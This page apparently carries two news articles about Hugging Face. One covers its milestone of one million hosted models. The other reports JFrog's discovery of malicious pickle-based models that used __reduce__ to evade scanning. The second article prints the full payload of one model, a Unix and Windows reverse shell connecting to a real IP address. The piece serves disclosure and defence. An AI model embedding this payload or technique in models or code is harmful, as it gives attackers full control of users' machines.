Hugging Face

exponential-growth-brews-1-million-ai-models-on-hugging-face

Exponential growth brews 1 million AI models on Hugging Face

The sand has come alive —

Hugging Face cites community-driven customization as fuel for diverse AI model boom.

The Hugging Face logo in front of shipping containers.

On Thursday, AI hosting platform Hugging Face surpassed 1 million AI model listings for the first time, marking a milestone in the rapidly expanding field of machine learning. An AI model is a computer program (often using a neural network) trained on data to perform specific tasks or make predictions. The platform, which started as a chatbot app in 2016 before pivoting to become an open source hub for AI models in 2020, now hosts a wide array of tools for developers and researchers.

The machine-learning field represents a far bigger world than just large language models (LLMs) like the kind that power ChatGPT. In a post on X, Hugging Face CEO Clément Delangue wrote about how his company hosts many high-profile AI models, like “Llama, Gemma, Phi, Flux, Mistral, Starcoder, Qwen, Stable diffusion, Grok, Whisper, Olmo, Command, Zephyr, OpenELM, Jamba, Yi,” but also “999,984 others.”

The reason why, Delangue says, stems from customization. “Contrary to the ‘1 model to rule them all’ fallacy,” he wrote, “smaller specialized customized optimized models for your use-case, your domain, your language, your hardware and generally your constraints are better. As a matter of fact, something that few people realize is that there are almost as many models on Hugging Face that are private only to one organization—for companies to build AI privately, specifically for their use-cases.”

A Hugging Face-supplied chart showing the number of AI models added to Hugging Face over time, month to month.

Enlarge / A Hugging Face-supplied chart showing the number of AI models added to Hugging Face over time, month to month.

Hugging Face’s transformation into a major AI platform follows the accelerating pace of AI research and development across the tech industry. In just a few years, the number of models hosted on the site has grown dramatically along with interest in the field. On X, Hugging Face product engineer Caleb Fahlgren posted a chart of models created each month on the platform (and a link to other charts), saying, “Models are going exponential month over month and September isn’t even over yet.”

The power of fine-tuning

As hinted by Delangue above, the sheer number of models on the platform stems from the collaborative nature of the platform and the practice of fine-tuning existing models for specific tasks. Fine-tuning means taking an existing model and giving it additional training to add new concepts to its neural network and alter how it produces outputs. Developers and researchers from around the world contribute their results, leading to a large ecosystem.

For example, the platform hosts many variations of Meta’s open-weights Llama models that represent different fine-tuned versions of the original base models, each optimized for specific applications.

Hugging Face’s repository includes models for a wide range of tasks. Browsing its models page shows categories such as image-to-text, visual question answering, and document question answering under the “Multimodal” section. In the “Computer Vision” category, there are sub-categories for depth estimation, object detection, and image generation, among others. Natural language processing tasks like text classification and question answering are also represented, along with audio, tabular, and reinforcement learning (RL) models.

A screenshot of the Hugging Face models page captured on September 26, 2024.

Enlarge / A screenshot of the Hugging Face models page captured on September 26, 2024.

Hugging Face

When sorted for “most downloads,” the Hugging Face models list reveals trends about which AI models people find most useful. At the top, with a massive lead at 163 million downloads, is Audio Spectrogram Transformer from MIT, which classifies audio content like speech, music, and environmental sounds. Following that, with 54.2 million downloads, is BERT from Google, an AI language model that learns to understand English by predicting masked words and sentence relationships, enabling it to assist with various language tasks.

Rounding out the top five AI models are all-MiniLM-L6-v2 (which maps sentences and paragraphs to 384-dimensional dense vector representations, useful for semantic search), Vision Transformer (which processes images as sequences of patches to perform image classification), and OpenAI’s CLIP (which connects images and text, allowing it to classify or describe visual content using natural language).

No matter what the model or the task, the platform just keeps growing. “Today a new repository (model, dataset or space) is created every 10 seconds on HF,” wrote Delangue. “Ultimately, there’s going to be as many models as code repositories and we’ll be here for it!”

Exponential growth brews 1 million AI models on Hugging Face Read More »

hugging-face,-the-github-of-ai,-hosted-code-that-backdoored-user-devices

Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting virus from a string of binary code. Hand with the word

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.

A lab machine set up as a honeypot to observe what happened when the model was loaded.

JFrog

Secrets and other bait data the honeypot used to attract the threat actor.

Enlarge / Secrets and other bait data the honeypot used to attract the threat actor.

JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickles is commonly used in Python to convert objects and classes in human-readable code into a byte stream so that it can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity of sneaking malicious code into the flow.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.

JFrog’s Cohen explained the process in much more technically detailed language:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"  RPORT = 4242    from sys import platform    if platform != 'win32':      import threading      import socket      import pty      import os        def connect_and_spawn_shell():          s = socket.socket()          s.connect((RHOST, RPORT))          [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]          pty.spawn("https://arstechnica.com/bin/sh")        threading.Thread(target=connect_and_spawn_shell).start()  else:      import os      import socket      import subprocess      import threading      import sys        def send_to_process(s, p):          while True:              p.stdin.write(s.recv(1024).decode())              p.stdin.flush()        def receive_from_process(s, p):          while True:              s.send(p.stdout.read(1).encode())        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        while True:          try:              s.connect((RHOST, RPORT))              break          except:              pass        p = subprocess.Popen(["powershell.exe"],                            stdout=subprocess.PIPE,                           stderr=subprocess.STDOUT,                           stdin=subprocess.PIPE,                           shell=True,                           text=True)        threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()      threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()      p.wait()

Hugging Face has since removed the model and the others flagged by JFrog.

Hugging Face, the GitHub of AI, hosted code that backdoored user devices Read More »